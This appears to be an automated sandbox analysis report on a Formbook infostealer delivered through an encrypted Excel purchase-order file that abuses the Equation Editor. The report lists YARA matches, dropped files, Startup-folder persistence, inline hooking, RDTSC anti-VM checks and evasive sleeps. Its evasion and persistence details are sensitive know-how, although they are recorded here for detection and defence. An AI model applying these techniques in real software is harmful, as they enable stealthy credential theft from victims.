Source: 00000007.00000002.2220136136.00000000034E6000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2220136136.00000000034E6000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.2225048844.0000000000250000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.2225048844.0000000000250000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2382110652.0000000000230000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.2382110652.0000000000230000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2381962745.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.2381962745.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2237415412.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2237415412.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.2225094311.0000000000360000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.2225094311.0000000000360000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2193435014.0000000003703000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.2193435014.0000000003703000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.2225125091.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.2225125091.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.2238667195.0000000000100000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.2238667195.0000000000100000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.2257843433.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.2257843433.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: vbc[1].exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: vbc.exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: vbc.exe.4.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: explorer.exe, 00000006.00000000.2203741293.0000000003C40000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.troj.adwa.spyw.expl.evad.winXLSX@14/11@5/3
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_00092720 CoInitialize,CoCreateInstance,OleUninitialize, 9_2_00092720
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$PO11272020.xlsx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR1332.tmp
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: PO11272020.xlsx Virustotal: Detection: 35%
Source: PO11272020.xlsx ReversingLabs: Detection: 25%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: unknown Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe'
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe
Source: unknown Process created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
Source: unknown Process created: C:\Windows\SysWOW64\autochk.exe C:\Windows\SysWOW64\autochk.exe
Source: unknown Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: unknown Process created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe C:\Program Files (x86)\Mozilla Firefox\Firefox.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe
Source: C:\Windows\SysWOW64\chkdsk.exe Process created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe C:\Program Files (x86)\Mozilla Firefox\Firefox.exe
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: C:\Windows\SysWOW64\chkdsk.exe File written: C:\Users\user\AppData\Roaming\98-QN40B\98-logri.ini
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\Public\vbc.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: PO11272020.xlsx Static file information: File size 2454528 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: netstat.pdb source: vbc.exe, 00000005.00000002.2237473398.0000000000469000.00000004.00000020.sdmp
Source: Binary string: chkdsk.pdb source: vbc.exe, 00000008.00000002.2225152811.00000000004E4000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdb source: vbc.exe, chkdsk.exe
Source: Binary string: c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\obj-firefox\browser\app\firefox.pdb source: chkdsk.exe, 00000009.00000003.2255516069.0000000003C40000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Administrator\Desktop\Testeconnect\obj\Debug\Testeconnect.pdb source: vbc.exe
Source: Binary string: C:\Users\Administrator\Desktop\Testeconnect\obj\Debug\Testeconnect.pdb' source: vbc.exe, 00000004.00000002.2191903785.0000000000738000.00000004.00000020.sdmp
Source: PO11272020.xlsx Initial sample: OLE indicators vbamacros = False
Source: PO11272020.xlsx Initial sample: OLE indicators encrypted = True

Data Obfuscation:

.NET source code contains potential unpacker
Source: vbc[1].exe.2.dr, Testeconnect/Form2.cs .Net Code: HAJWD732JH7WA System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: vbc.exe.2.dr, Testeconnect/Form2.cs .Net Code: HAJWD732JH7WA System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: vbc.exe.4.dr, Testeconnect/Form2.cs .Net Code: HAJWD732JH7WA System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.2.vbc.exe.d70000.2.unpack, Testeconnect/Form2.cs .Net Code: HAJWD732JH7WA System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.vbc.exe.d70000.0.unpack, Testeconnect/Form2.cs .Net Code: HAJWD732JH7WA System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.vbc.exe.d70000.0.unpack, Testeconnect/Form2.cs .Net Code: HAJWD732JH7WA System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.2.vbc.exe.d70000.3.unpack, Testeconnect/Form2.cs .Net Code: HAJWD732JH7WA System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.2.vbc.exe.f20000.2.unpack, Testeconnect/Form2.cs .Net Code: HAJWD732JH7WA System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.vbc.exe.f20000.0.unpack, Testeconnect/Form2.cs .Net Code: HAJWD732JH7WA System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.2.vbc.exe.f20000.3.unpack, Testeconnect/Form2.cs .Net Code: HAJWD732JH7WA System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.0.vbc.exe.f20000.0.unpack, Testeconnect/Form2.cs .Net Code: HAJWD732JH7WA System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Binary contains a suspicious time stamp
Source: initial sample Static PE information: 0xE41D24F5 [Wed Apr 11 07:34:13 2091 UTC]
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 4_2_00190C59 push esp; iretd 4_2_00190D45
Source: C:\Users\Public\vbc.exe Code function: 4_2_00197F20 pushfd ; ret 4_2_00198129
Source: C:\Users\Public\vbc.exe Code function: 4_2_00198122 pushfd ; ret 4_2_00198129
Source: C:\Users\Public\vbc.exe Code function: 4_2_00190277 push esp; iretd 4_2_00190281
Source: C:\Users\Public\vbc.exe Code function: 4_2_00198BB8 push eax; retf 4_2_00198BC1
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041D0D2 push eax; ret 5_2_0041D0D8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041D0DB push eax; ret 5_2_0041D142
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041D085 push eax; ret 5_2_0041D0D8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041D13C push eax; ret 5_2_0041D142
Source: C:\Users\Public\vbc.exe Code function: 5_2_00407AD0 pushad ; iretd 5_2_00407ADC
Source: C:\Users\Public\vbc.exe Code function: 5_2_00405DE1 push ds; iretd 5_2_00405DE7
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041659B push ecx; ret 5_2_004165A2
Source: C:\Users\Public\vbc.exe Code function: 5_2_0084DFA1 push ecx; ret 5_2_0084DFB4
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 7_2_00390C59 push esp; iretd 7_2_00390D45
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 7_2_00397F20 pushfd ; ret 7_2_00398129
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 7_2_00398122 pushfd ; ret 7_2_00398129
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 7_2_00390277 push esp; iretd 7_2_00390281
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 7_2_00398BB8 push eax; retf 7_2_00398BC1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_0041D0D2 push eax; ret 8_2_0041D0D8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_0041D0DB push eax; ret 8_2_0041D142
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_0041D085 push eax; ret 8_2_0041D0D8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_0041D13C push eax; ret 8_2_0041D142
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_00407AD0 pushad ; iretd 8_2_00407ADC
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_00405DE1 push ds; iretd 8_2_00405DE7
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_0041659B push ecx; ret 8_2_004165A2
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008CDFA1 push ecx; ret 8_2_008CDFB4
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0254DFA1 push ecx; ret 9_2_0254DFB4
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0009D085 push eax; ret 9_2_0009D0D8
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0009D0DB push eax; ret 9_2_0009D142
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0009D0D2 push eax; ret 9_2_0009D0D8
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0009D13C push eax; ret 9_2_0009D142
Source: initial sample Static PE information: section name: .text entropy: 7.93997758183

Persistence and Installation Behavior:

Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Users\Public\vbc.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe

Boot Survival:

Drops PE files to the startup folder
Source: C:\Users\Public\vbc.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe
Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\Users\Public\vbc.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe
Stores files to the Windows start menu directory
Source: C:\Users\Public\vbc.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x82 0x2E 0xE5
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: PO11272020.xlsx Stream path 'EncryptedPackage' entropy: 7.9999248079 (max. 8.0)

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe RDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\chkdsk.exe RDTSC instruction interceptor: First address: 00000000000898E4 second address: 00000000000898EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\chkdsk.exe RDTSC instruction interceptor: First address: 0000000000089B4E second address: 0000000000089B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NETSTAT.EXE RDTSC instruction interceptor: First address: 00000000001098E4 second address: 00000000001098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NETSTAT.EXE RDTSC instruction interceptor: First address: 0000000000109B4E second address: 0000000000109B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 5_2_00409A80 rdtsc 5_2_00409A80
Contains long sleeps (>= 3 min)
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2472 Thread sleep time: -240000s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 260 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 260 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2660 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 2520 Thread sleep time: -58000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe TID: 2956 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe TID: 2200 Thread sleep time: -32000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\chkdsk.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\ Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\ Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe File opened: C:\Users\user\ Jump to behavior
Source: explorer.exe, 00000006.00000000.2194662661.00000000001F5000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.2206084235.0000000004234000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000006.00000000.2206127448.0000000004263000.00000004.00000001.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
Source: explorer.exe, 00000006.00000000.2205994745.00000000041AD000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: explorer.exe, 00000006.00000000.2194693430.0000000000231000.00000004.00000020.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
Source: C:\Users\Public\vbc.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

Checks if the current process is being debugged
